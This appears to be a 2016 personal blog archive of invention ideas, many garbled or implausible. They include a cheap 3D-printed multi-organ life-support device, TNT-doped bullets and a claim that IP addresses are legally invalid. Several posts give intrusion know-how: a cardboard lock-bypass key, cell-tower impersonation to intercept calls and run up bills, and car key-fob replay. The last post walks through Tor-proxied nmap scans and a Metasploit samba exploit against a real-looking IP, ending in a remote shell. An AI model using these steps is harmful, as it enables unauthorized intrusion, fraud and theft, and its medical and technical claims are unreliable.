Monday, November 7, 2016


You need to be a Blogger, and Using a Pen name. Legal in all fifty states.

Use this template... print and laminate at staples or kinkos.

Why dont you love kittens? - Robert Paulson 

Sunday, November 6, 2016

Warning Nationwide ISP Vulnerability

Read this carefully.
The IP Address is legally invalid.

A. As it means you cannot reliably Prosecute cyber-crimes based on IP Address alone until the problem is fixed.

B. Cases in which the IP address was used in Prosecution must be reopened by law. 

C. This also makes tracking people reliably next to impossible.

D. Anyone can be framed.

1.Where are they (or the Empty House?)

Modems are registered to a specific household.
These modems don't have to be in that household, and can be connected anywhere on the network. As in any place with a coaxial cable connected to the open ISP network.

2.Anyone can be framed.

Modems identify themselves via Mac address to the ISP, This Mac address is printed on the side of the modem. The Modem is then given an IP address based on that Mac Address.
The issue is The Mac Address can be cloned in a new modem and that can be anywhere on the open network. The new modem appears to be the registered user at the registered address. The ISP sees 2 IPs assigned but cannot tell if it is the same modem, as the Mac address is the same.

There are two modems currently on the market that can configure the Mac address at will.

Solutions Now.

Quick Solution: Put up a captive portals at the ISP level. The user must enter a password and username every-time the modem is plugged in somewhere. Usename and Password must be kept secret. (Some ISP already use captive portals, but not in this configuration). This should take a day to implement nation wide. I could do this alone in a day.

Secure long term solution: Include a hardware based Random Alpha Numeric Integer Authentication Token of extreme length. Transmit the Token via SSL To the ISP. Include this with the captive portal and the problem is solved long term.

It turns out until then the concept of the IP address has always been and will always be invalid.

Post Script: I didn't make the hole I just found it & I've given two solutions. 

Friday, November 4, 2016

Cardboard Key

Take a smartphone, and a coin and a key.
Take a picture of the key next to the coin, With the smartphone.
Enlarge the picture to the size of a real coin and Print the Photo.
Cut out the key from the Photo.

Place the key up to a piece of thin cardboard and outline it with a pen.
Cut out the outline and insert into the lock along with a small screwdriver and turn to open lock.

Wednesday, November 2, 2016

3D printed Portable life support system for around $2000 (Work in progress)

I retain all rights to intellectual property. But anyone may build this for free.

updated often!!

Heart, Lung, Liver and Kidneys thus far. The size of a Beer Cooler. Will keep the Patient alive for 10 hours on UPS battery supply in transit or indefinitely on mains power. #First Response  #EMT, #Field Medic, #Hospice. #3rd world.

3d printed Carbon fiber pipe and piston + rubber gasket 
gray, red and blue)  (valves, inside green inside red and inside blue) $560
3D printed Valve that separates liquid from air (Bright Green).

3D printed Pressure Valve (liquid, one-way,up)(Red).

3D printed Pressure Valve (liquid, one-way down)(Blue).

3D printed Pressure Valve  (air, two way). (Brown).

BNC Gasmask filters  x4 (Dark purple) $200
Air tubing (Light Blue)

Rigid chain actuator x8 (Mustard yellow) $300

Clot catchers & oxygenation medium, Sterile Surgical sponge material (Light purple) $140

Raspberry pi $35

Arduino Uno R3 (Atmega328 - assembled) PRODUCT ID: 50 $24.95 x2

Adafruit Motor/Stepper/Servo Shield for Arduino v2 Kit - v2.3 PRODUCT ID: 1438 $19.95 x2 $40

13v dc x 8
SUPERNIGHT Waterproof DC 12V Step UP to DC 24V 72W 3A Thin Converter Regulator voltage protector $19.99 x8 $160


(To Rigid chain actuators)

8 two way air pressure valves (Titanium  carbide)(Brown) $80
4 with nobs to switch from just lung to heart and lung.

Super cap bank (Lite green) $100

Breta filter (black) 8 x 20 $160

Can be used as a carbon dioxide scrubber it also removes toxins.


Cleaning cycle with bleach.

Design of all 4 Valves included. Blue (liquid, one-way down) 
Green (separates air from blood one-way up) Red (liquid, one-way up) Brown (two way pressure valve).

I retain all rights to intellectual property. But anyone may build this for free.

Saturday, October 29, 2016

Stark Plating - Full Coverage Body Armor

This costume is fiberglass, but can be used as a mold for Ballistic Carbon Fiber Parts. The CNT Ballistic Carbon Fiber should be applied with CNT epoxy and layered in a random clockwise and counter-clockwise pattern to prevent uniform weak spots. LEVEL IV Protection. Lite as plastic stronger than steel.

Carbon Nanotube Epoxy

Carbon Nanotube Fabric

Wednesday, October 26, 2016

Ultra secure BSD based smartphone OS with Biometric verification Fingerprint reader

Ultra secure BSD based smartphone encrypted OS with
Biometric verification Fingerprint reader & biometric facial recognition + Ported android apps..

Hidden OS for Android phone

Rubber-who's Hidden encrypted OS for android phone, to open upon entry of a different pass code. You can always give up another password.

Project LUCKY - Bug detector/jammer + Real Time Person Detector/Locator Smartphone App

Detect Smartphone (or bug) location via signal strength and direction. Map on google maps overlay.
(optional as this blinds you) g3/g4 short range Cell phone/bug jammer aswell,  Jam every frequency but the one you are on .

See where the closest people are, or track in real time or open a bubble of complete privacy. 420 and talk in peace. (or find a person buried under rubble who has a cell phone on, or finding a lost child.)

Vampire Smart Phone App

Pretend to be a g3 cell tower, Scan airwaves for cell phone signals and sniff traffic (as in intercept smartphone calls and internet traffic). Clone un-encrypted unique ID in transit MITM.
Appear to be that user (from every dimension) run up cell phone bill. 

All in real time and at the push of a button.

Open Any Car Door with a Smart Phone App!

Keyless Entry Remote Control Car Key Fob

(Capture its un-encrypted signal via Android Smart Phone in any parking lot. Re-transmit to open doors.)

Tuesday, October 25, 2016

Warm coffee, cold beer - duel thermos for liquid. one side hot, one side cold (portable solar power charger)

Flexable 5 watt Solar panel

x5 Supercapacitor Battery 5v

Solar power charger circuit

(From battery supercap bank)

x3 2A 12V 23W Thermoelectric-Peltier®-TEC1-12702-40x40x4mm-Thermoelectric-Peltier/dp/B01KACT6IE/ref=sr_1_fkmr0_1?

High Strength Carbon fiber body

3D Carbon Fiber Printer


SHA512 Password cracker

  • $649.00

BITMAIN ANTMINER S7 (BATCH 8) 4.73TH/s @ .25W/GH 28nm ASIC Bitcoin Miner


4730TH/s Cluster

modded to run linux and

Prometheus firestarter. Start a campfire in the wind, rain or snow without fire

Glycerin in a breakable plastic capsule, inserted into a semi-sealed aluminum pouch filled potassium permanganate. break and toss into the hearth.

2. waterproof design
Long 6 inch Glowsticks filled with potassium permanganate & oxygen with Glycerin in a breakable glass capsule insert.  break and toss into the hearth.

3. design 3 (burns under water, but why?) Long 6 inch Glowsticks filled with  sodium + wax & oxygen with water in a breakable glass capsule insert.

Friday, October 14, 2016

Solar powered electric lighter, ir led and flashlight + Emergency taser attachment and EMP

Solar powered electric lighter, Flashlight and IR LED + Emergency taser attachment

Solar panel
charging circuit
Super capacitor
voltage step up circuit
Small Electromagnet
Carbon fiber case the size of a pack of cigarettes

Tungsten carbine heating element.

Sunlight reactive Color changing hair dye.

Hair dye that changes color in the daytime from a seprate color at night.

Tuesday, June 14, 2016

USB self destruct adapter.

A adapter that plugs into a USB stick that fries the internal chip. consisting of a step up voltage regulator a female usb adapter and large capacitor and switch.

Sunday, May 8, 2016

TnT doped high velocity tungsten carbide rounds

TnT doped high velocity tungsten carbide rounds.

TNT doping by the "mg" to increase Velocity of rounds. (Might require reinforced barrels.)

Saturday, May 7, 2016


Can be used in recon and to peek around corners.

LRAD sensor

LIDAR is a surveying technology that measures distance by illuminating a target with a laser light. Lidar exists as an acronym of Light Detection And Ranging, and was originally created as a portmanteau of "light" and "radar" RAdio Detection And Ranging.

Micro hd day/night camera

Thursday, April 14, 2016

Submersible Hover transport drone

  • Reduced sound due to electric engines.
  • Can land at night with no light.
  • Can carry 100 people at 240 pounds each.
  • Armored (4A).
  • Can land on the water (submersible) or on land .

Hinged rubber lined humane handcuffs

Hinged rubber lined humane handcuffs.

Saturday, February 20, 2016


Razor blade with ballistic grade ceramic blades, never dulls.

Friday, February 5, 2016

Hacking with Kali and friends - Exploitorama

Scan the ip with nmap + proxychains to route it over tor;

anon@1337-817chs:~$sudo proxychains nmap -v -Pn -Ss -T4 -A -p 1-65535 104.28.##.105

Scan the site with nikto and uniscan + proxychains to route it over tor;

anon@1337-817chs:~$sudo proxychains nikto -h && proxychains nikto -h 104.28.##.105

anon@1337-817chs:~$sudo proxychains ./uniscan -u

that will take awhile...check on your sqlmap results from chapter 1

any usernames or passwords? ooh goody...
on too metasploit!!

The following info should have been obtained with the help of the tor cloaked scanning 

Target ip (from nslookup) 104.28.##.105
Target OS and Version (from nmap set to zero ping "-Pn" to avoid detection The
 -Ss option tells nmap to perform a stealth scan, the -A option tells it to try to discover OS)
kick it oldschool by googling  "OS version Exploit Metasploit" to check for any quick exploit modules in Metasploit. 

 We need to find out the OS and ports and services running on the target system.
Once you find the open ports and service like a samba port its party time.

Fire up Metasploit 

Route it through TOR
msf >set Proxies socks5:

We need to find the version of samba..

msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) >set RHOST 104.28.##.105
RHOST => 104.28.##.105
msfauxiliary(smb_version) >set RPORT 445
RPORT => 445
msfauxiliary(smb_version) >exploit

With version in hand, restart msfconsole now we use the appropriate module...

msf >set Proxies socks5:
msf >use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 104.28.##.105
msf exploit(usermap_script) >exploit

We now have a command shell on the target box... have fun!